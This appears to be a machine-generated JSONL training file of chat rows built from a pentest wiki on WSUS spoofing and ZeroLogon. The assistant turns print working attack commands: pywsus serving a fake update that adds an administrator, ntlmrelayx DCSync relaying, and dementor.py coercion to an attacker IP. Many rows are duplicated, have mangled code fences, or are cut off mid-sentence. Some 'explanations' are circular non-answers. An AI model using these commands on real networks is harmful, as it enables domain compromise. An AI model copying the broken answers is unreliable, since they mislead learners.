or intercept and modify updates sent to the clients.", "metadata": {"corpus_index": 914, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe WSUS spoofing - Practice in the context of penetration testing"}, {"role": "assistant", "content": "The following command prints the WSUS server the client requests when searching for an update. If the path looks like http://wsus.domain.local/, showing the use of HTTP instead of HTTPS, the attacks can be attempted.\n\n``\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver\n`\n\nThe WSUS spoofing attack can be conducted as follows\n\n1. Obtain a Man-in-the-Middle position between clients and the update server with ARP poisoning.\n2. Redirect traffic from clients -> legitimate WSUS to clients -> attacker's WSUS`\n3. Have a custom WSUS server running able to send evil updates to clients\n\nIn a scenario where the clients and the attacker are on the same subnet, and the update server is on another one, the steps below can be followed. For other scenarios or more info on ARP poisoning, a recipe exists for it.\n\n> [!TIP]\n> Read the arp-poisoning.md article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe WSUS spoofing - Practice in the context of penetration testing", "response": "The following command prints the WSUS server the client requests when searching for an update. If the path looks like http://wsus.domain.local/, showing the use of HTTP instead of HTTPS, the attacks can be attempted.\n\n``\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver\n`\n\nThe WSUS spoofing attack can be conducted as follows\n\n1. Obtain a Man-in-the-Middle position between clients and the update server with ARP poisoning.\n2. Redirect traffic from clients -> legitimate WSUS to clients -> attacker's WSUS`\n3. Have a custom WSUS server running able to send evil updates to clients\n\nIn a scenario where the clients and the attacker are on the same subnet, and the update server is on another one, the steps below can be followed. For other scenarios or more info on ARP poisoning, a recipe exists for it.\n\n> [!TIP]\n> Read the arp-poisoning.md article for more insight", "metadata": {"corpus_index": 915, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on WSUS spoofing - Practice"}, {"role": "assistant", "content": "The following command prints the WSUS server the client requests when searching for an update. If the path looks like http://wsus.domain.local/, showing the use of HTTP instead of HTTPS, the attacks can be attempted.\n\n``\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver\n`\n\nThe WSUS spoofing attack can be conducted as follows\n\n1. Obtain a Man-in-the-Middle position between clients and the update server with ARP poisoning.\n2. Redirect traffic from clients -> legitimate WSUS to clients -> attacker's WSUS`\n3. Have a custom WSUS server running able to send evil updates to clients\n\nIn a scenario where the clients and the attacker are on the same subnet, and the update server is on another one, the steps below can be followed. For other scenarios or more info on ARP poisoning, a recipe exists for it.\n\n> [!TIP]\n> Read the arp-poisoning.md article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on WSUS spoofing - Practice", "response": "The following command prints the WSUS server the client requests when searching for an update. If the path looks like http://wsus.domain.local/, showing the use of HTTP instead of HTTPS, the attacks can be attempted.\n\n``\nreg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver\n`\n\nThe WSUS spoofing attack can be conducted as follows\n\n1. Obtain a Man-in-the-Middle position between clients and the update server with ARP poisoning.\n2. Redirect traffic from clients -> legitimate WSUS to clients -> attacker's WSUS`\n3. Have a custom WSUS server running able to send evil updates to clients\n\nIn a scenario where the clients and the attacker are on the same subnet, and the update server is on another one, the steps below can be followed. For other scenarios or more info on ARP poisoning, a recipe exists for it.\n\n> [!TIP]\n> Read the arp-poisoning.md article for more insight", "metadata": {"corpus_index": 915, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use reg for wsus spoofing - practice?"}, {"role": "assistant", "content": "reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use reg for wsus spoofing - practice?", "response": "reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver", "metadata": {"corpus_index": 916, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "reg"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on WSUS spoofing - Practice"}, {"role": "assistant", "content": "reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on WSUS spoofing - Practice", "response": "reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver", "metadata": {"corpus_index": 916, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver`?"}, {"role": "assistant", "content": "This command is used for wsus spoofing - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\WindowsUpdate /v wuserver`?", "response": "This command is used for wsus spoofing - practice. Practice", "metadata": {"corpus_index": 916, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about WSUS spoofing - Preparing the evil WSUS?"}, {"role": "assistant", "content": "The evil WSUS server needs to be started before doing any ARP poisoning. The pywsus (Python) utility can be used for that matter.\n\n``bash\npython3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'\n``\n\nPrograms other than PsExec.exe can be used here. Using built-in programs features to bypass security restrictions or operate attacks like this is called Living off the land (LOL). Other Windows LOL binaries and scripts (a.k.a. LOLbins or LOLbas) can be found on lolbas-project.github.io."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about WSUS spoofing - Preparing the evil WSUS?", "response": "The evil WSUS server needs to be started before doing any ARP poisoning. The pywsus (Python) utility can be used for that matter.\n\n``bash\npython3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'\n``\n\nPrograms other than PsExec.exe can be used here. Using built-in programs features to bypass security restrictions or operate attacks like this is called Living off the land (LOL). Other Windows LOL binaries and scripts (a.k.a. LOLbins or LOLbas) can be found on lolbas-project.github.io.", "metadata": {"corpus_index": 917, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for WSUS spoofing - Preparing the evil WSUS?"}, {"role": "assistant", "content": "The evil WSUS server needs to be started before doing any ARP poisoning. The pywsus (Python) utility can be used for that matter.\n\n``bash\npython3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'\n``\n\nPrograms other than PsExec.exe can be used here. Using built-in programs features to bypass security restrictions or operate attacks like this is called Living off the land (LOL). Other Windows LOL binaries and scripts (a.k.a. LOLbins or LOLbas) can be found on lolbas-project.github.io."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for WSUS spoofing - Preparing the evil WSUS?", "response": "The evil WSUS server needs to be started before doing any ARP poisoning. The pywsus (Python) utility can be used for that matter.\n\n``bash\npython3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'\n``\n\nPrograms other than PsExec.exe can be used here. Using built-in programs features to bypass security restrictions or operate attacks like this is called Living off the land (LOL). Other Windows LOL binaries and scripts (a.k.a. LOLbins or LOLbas) can be found on lolbas-project.github.io.", "metadata": {"corpus_index": 917, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the python3 syntax for wsus spoofing - preparing the evil wsus?"}, {"role": "assistant", "content": "python3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the python3 syntax for wsus spoofing - preparing the evil wsus?", "response": "python3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'", "metadata": {"corpus_index": 918, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "python3"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for WSUS spoofing - Preparing the evil WSUS"}, {"role": "assistant", "content": "python3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for WSUS spoofing - Preparing the evil WSUS", "response": "python3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'", "metadata": {"corpus_index": 918, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `python3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'`?"}, {"role": "assistant", "content": "This command is used for wsus spoofing - preparing the evil wsus. Preparing the evil WSUS"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `python3 pywsus.py --host $network_facing_ip --port 8530 --executable /path/to/PsExec64.exe --command '/accepteula /s cmd.exe /c \"net user testuser somepassword /add && net localgroup Administrators testuser /add\"'`?", "response": "This command is used for wsus spoofing - preparing the evil wsus. Preparing the evil WSUS", "metadata": {"corpus_index": 918, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is WSUS spoofing - Poisoning and hijacking?"}, {"role": "assistant", "content": "Once the WSUS server is up and running, the ARP poisoning attack can start. The best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required.\n\nPackets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is WSUS spoofing - Poisoning and hijacking?", "response": "Once the WSUS server is up and running, the ARP poisoning attack can start. The best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required.\n\nPackets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\n```bash", "metadata": {"corpus_index": 919, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through WSUS spoofing - Poisoning and hijacking"}, {"role": "assistant", "content": "Once the WSUS server is up and running, the ARP poisoning attack can start. The best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required.\n\nPackets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through WSUS spoofing - Poisoning and hijacking", "response": "Once the WSUS server is up and running, the ARP poisoning attack can start. The best tool to operate ARP poisoning is bettercap (Go) and for the majority of the scenarios, basic knowledge of the iptables utility is required.\n\nPackets from the client to the WSUS server need to be hijacked and sent to the attacker's evil WSUS server. In order to do so, the attacker must pose as the client's gateway, route all traffic to the real gateway except the packets destined to the WSUS server.\n\n```bash", "metadata": {"corpus_index": 919, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does WSUS spoofing - Triggering Windows update work?"}, {"role": "assistant", "content": "The search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates. \n\n> [!TIP]\n> By default, the automatic updates interval is 22 hours (source)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does WSUS spoofing - Triggering Windows update work?", "response": "The search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates. \n\n> [!TIP]\n> By default, the automatic updates interval is 22 hours (source).", "metadata": {"corpus_index": 920, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do WSUS spoofing - Triggering Windows update"}, {"role": "assistant", "content": "The search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates. \n\n> [!TIP]\n> By default, the automatic updates interval is 22 hours (source)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do WSUS spoofing - Triggering Windows update", "response": "The search for Windows updates can be manually triggered when having access to the target computer by going to Settings > Update & Security > Windows Update > Check for updates. \n\n> [!TIP]\n> By default, the automatic updates interval is 22 hours (source).", "metadata": {"corpus_index": 920, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does WSUS spoofing - Alternative attack work?"}, {"role": "assistant", "content": "Another way of attacking insecure WSUS without having to rely on ARP poisoning but requiring user access to the target machine is explained in the following blogpost : WSUS Attacks Part 2: CVE-2020-1013 a Windows 10 Local Privilege Escalation 1-Day"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does WSUS spoofing - Alternative attack work?", "response": "Another way of attacking insecure WSUS without having to rely on ARP poisoning but requiring user access to the target machine is explained in the following blogpost : WSUS Attacks Part 2: CVE-2020-1013 a Windows 10 Local Privilege Escalation 1-Day", "metadata": {"corpus_index": 921, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out WSUS spoofing - Alternative attack during a pentest?"}, {"role": "assistant", "content": "Another way of attacking insecure WSUS without having to rely on ARP poisoning but requiring user access to the target machine is explained in the following blogpost : WSUS Attacks Part 2: CVE-2020-1013 a Windows 10 Local Privilege Escalation 1-Day"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out WSUS spoofing - Alternative attack during a pentest?", "response": "Another way of attacking insecure WSUS without having to rely on ARP poisoning but requiring user access to the target machine is explained in the following blogpost : WSUS Attacks Part 2: CVE-2020-1013 a Windows 10 Local Privilege Escalation 1-Day", "metadata": {"corpus_index": 921, "category": "network", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/wsus-spoofing.md", "page_title": "WSUS spoofing", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about ZeroLogon - Theory?"}, {"role": "assistant", "content": "Netlogon is a service verifying logon requests, registering, authenticating, and locating domain controllers. MS-NRPC, the Netlogon Remote Protocol RPC interface is an authentication mechanism part of that service. MS-NRPC is used primarily to maintain the relationship between a machine and its domain, and relationships among domain controllers (DCs) and domains.\n\nThe CVE-2020-1472 findings demonstrated that MS-NRPC used a custom and insecure cryptographic protocol (i.e. it reuses a known, static, zero-value Initialization Vector (IV) in an AES-CFB8 mode) when establishing a Netlogon Secure Channel connection to a Domain Controller allowing for an Elevation of Privilege vulnerability.\n\nThere were many concepts to understand in the original exploit scenario (the \"password change\" one).\n\n* Concept #1: authentication through MS-NRPC uses AES-CFB8. This means that for 1 in 256 possibilities, every block of the ciphertext will be \\x00 bytes if both the IV and the plaintext are \\x00 bytes.\n* Concept #2: authentication through MS-NRPC uses a static and null IV (only \\x00 bytes, hence partly validating concept #1).\n* Concept #3: MS-NRPC signing and sealing don't rely on the same vulnerable mechanisms but are optional and can be ignored.\n* Concept #4: machine accounts have an unlimited number of login attempts, hence allowing for an authentication bypass and the spoofing of these accounts thanks to concepts #1 and #2 (by using a plaintext filled with \\x00 bytes and by doing enough attempts).\n* Concept #5: the NetrServerPasswordSet2 call can be used to reset an account's password. The new password structure to supply in this call has to be encrypted with the same vulnerable mechanisms stated in concepts #1 and #2.\n* Concept #6: the password structure can be filled with \\x00 bytes, leading to the setting a new password of a 0 characters length for the target account.\n* Concept #7: all previous concepts can be chained to reset a domain controller's password and obtain domain-ad"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about ZeroLogon - Theory?", "response": "Netlogon is a service verifying logon requests, registering, authenticating, and locating domain controllers. MS-NRPC, the Netlogon Remote Protocol RPC interface is an authentication mechanism part of that service. MS-NRPC is used primarily to maintain the relationship between a machine and its domain, and relationships among domain controllers (DCs) and domains.\n\nThe CVE-2020-1472 findings demonstrated that MS-NRPC used a custom and insecure cryptographic protocol (i.e. it reuses a known, static, zero-value Initialization Vector (IV) in an AES-CFB8 mode) when establishing a Netlogon Secure Channel connection to a Domain Controller allowing for an Elevation of Privilege vulnerability.\n\nThere were many concepts to understand in the original exploit scenario (the \"password change\" one).\n\n* Concept #1: authentication through MS-NRPC uses AES-CFB8. This means that for 1 in 256 possibilities, every block of the ciphertext will be \\x00 bytes if both the IV and the plaintext are \\x00 bytes.\n* Concept #2: authentication through MS-NRPC uses a static and null IV (only \\x00 bytes, hence partly validating concept #1).\n* Concept #3: MS-NRPC signing and sealing don't rely on the same vulnerable mechanisms but are optional and can be ignored.\n* Concept #4: machine accounts have an unlimited number of login attempts, hence allowing for an authentication bypass and the spoofing of these accounts thanks to concepts #1 and #2 (by using a plaintext filled with \\x00 bytes and by doing enough attempts).\n* Concept #5: the NetrServerPasswordSet2 call can be used to reset an account's password. The new password structure to supply in this call has to be encrypted with the same vulnerable mechanisms stated in concepts #1 and #2.\n* Concept #6: the password structure can be filled with \\x00 bytes, leading to the setting a new password of a 0 characters length for the target account.\n* Concept #7: all previous concepts can be chained to reset a domain controller's password and obtain domain-ad", "metadata": {"corpus_index": 922, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on ZeroLogon - Theory"}, {"role": "assistant", "content": "Netlogon is a service verifying logon requests, registering, authenticating, and locating domain controllers. MS-NRPC, the Netlogon Remote Protocol RPC interface is an authentication mechanism part of that service. MS-NRPC is used primarily to maintain the relationship between a machine and its domain, and relationships among domain controllers (DCs) and domains.\n\nThe CVE-2020-1472 findings demonstrated that MS-NRPC used a custom and insecure cryptographic protocol (i.e. it reuses a known, static, zero-value Initialization Vector (IV) in an AES-CFB8 mode) when establishing a Netlogon Secure Channel connection to a Domain Controller allowing for an Elevation of Privilege vulnerability.\n\nThere were many concepts to understand in the original exploit scenario (the \"password change\" one).\n\n* Concept #1: authentication through MS-NRPC uses AES-CFB8. This means that for 1 in 256 possibilities, every block of the ciphertext will be \\x00 bytes if both the IV and the plaintext are \\x00 bytes.\n* Concept #2: authentication through MS-NRPC uses a static and null IV (only \\x00 bytes, hence partly validating concept #1).\n* Concept #3: MS-NRPC signing and sealing don't rely on the same vulnerable mechanisms but are optional and can be ignored.\n* Concept #4: machine accounts have an unlimited number of login attempts, hence allowing for an authentication bypass and the spoofing of these accounts thanks to concepts #1 and #2 (by using a plaintext filled with \\x00 bytes and by doing enough attempts).\n* Concept #5: the NetrServerPasswordSet2 call can be used to reset an account's password. The new password structure to supply in this call has to be encrypted with the same vulnerable mechanisms stated in concepts #1 and #2.\n* Concept #6: the password structure can be filled with \\x00 bytes, leading to the setting a new password of a 0 characters length for the target account.\n* Concept #7: all previous concepts can be chained to reset a domain controller's password and obtain domain-ad"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on ZeroLogon - Theory", "response": "Netlogon is a service verifying logon requests, registering, authenticating, and locating domain controllers. MS-NRPC, the Netlogon Remote Protocol RPC interface is an authentication mechanism part of that service. MS-NRPC is used primarily to maintain the relationship between a machine and its domain, and relationships among domain controllers (DCs) and domains.\n\nThe CVE-2020-1472 findings demonstrated that MS-NRPC used a custom and insecure cryptographic protocol (i.e. it reuses a known, static, zero-value Initialization Vector (IV) in an AES-CFB8 mode) when establishing a Netlogon Secure Channel connection to a Domain Controller allowing for an Elevation of Privilege vulnerability.\n\nThere were many concepts to understand in the original exploit scenario (the \"password change\" one).\n\n* Concept #1: authentication through MS-NRPC uses AES-CFB8. This means that for 1 in 256 possibilities, every block of the ciphertext will be \\x00 bytes if both the IV and the plaintext are \\x00 bytes.\n* Concept #2: authentication through MS-NRPC uses a static and null IV (only \\x00 bytes, hence partly validating concept #1).\n* Concept #3: MS-NRPC signing and sealing don't rely on the same vulnerable mechanisms but are optional and can be ignored.\n* Concept #4: machine accounts have an unlimited number of login attempts, hence allowing for an authentication bypass and the spoofing of these accounts thanks to concepts #1 and #2 (by using a plaintext filled with \\x00 bytes and by doing enough attempts).\n* Concept #5: the NetrServerPasswordSet2 call can be used to reset an account's password. The new password structure to supply in this call has to be encrypted with the same vulnerable mechanisms stated in concepts #1 and #2.\n* Concept #6: the password structure can be filled with \\x00 bytes, leading to the setting a new password of a 0 characters length for the target account.\n* Concept #7: all previous concepts can be chained to reset a domain controller's password and obtain domain-ad", "metadata": {"corpus_index": 922, "category": "crypto", "source_file": "docs/src/ad/movement/netlogon/zerologon.md", "page_title": "ZeroLogon", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain ZeroLogon - Authentication relay technique"}, {"role": "assistant", "content": "Another technique, showcased by Dirk-jan no later than 2 weeks after the public disclosure, highlighted another way of exploiting the vulnerability. That technique relies on a relayed authentication to directly operate a DCSync, hence having no impact on the continuity of services.\n\nIn order to operate the attack, the Impacket's script ntlmrelayx (Python) can be used.\n\n``bash\nntlmrelayx -t dcsync://$domain_controller_2 -smb2support\n`\n\nOnce the relay servers are up and running and waiting for incoming trafic, attackers need to coerce a Domain Controller's authentication (or from another account with enough privileges). One way of doing this is to rely on the PrinterBug.\n\n`bash\ndementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain ZeroLogon - Authentication relay technique", "response": "Another technique, showcased by Dirk-jan no later than 2 weeks after the public disclosure, highlighted another way of exploiting the vulnerability. That technique relies on a relayed authentication to directly operate a DCSync, hence having no impact on the continuity of services.\n\nIn order to operate the attack, the Impacket's script ntlmrelayx (Python) can be used.\n\n``bash\nntlmrelayx -t dcsync://$domain_controller_2 -smb2support\n`\n\nOnce the relay servers are up and running and waiting for incoming trafic, attackers need to coerce a Domain Controller's authentication (or from another account with enough privileges). One way of doing this is to rely on the 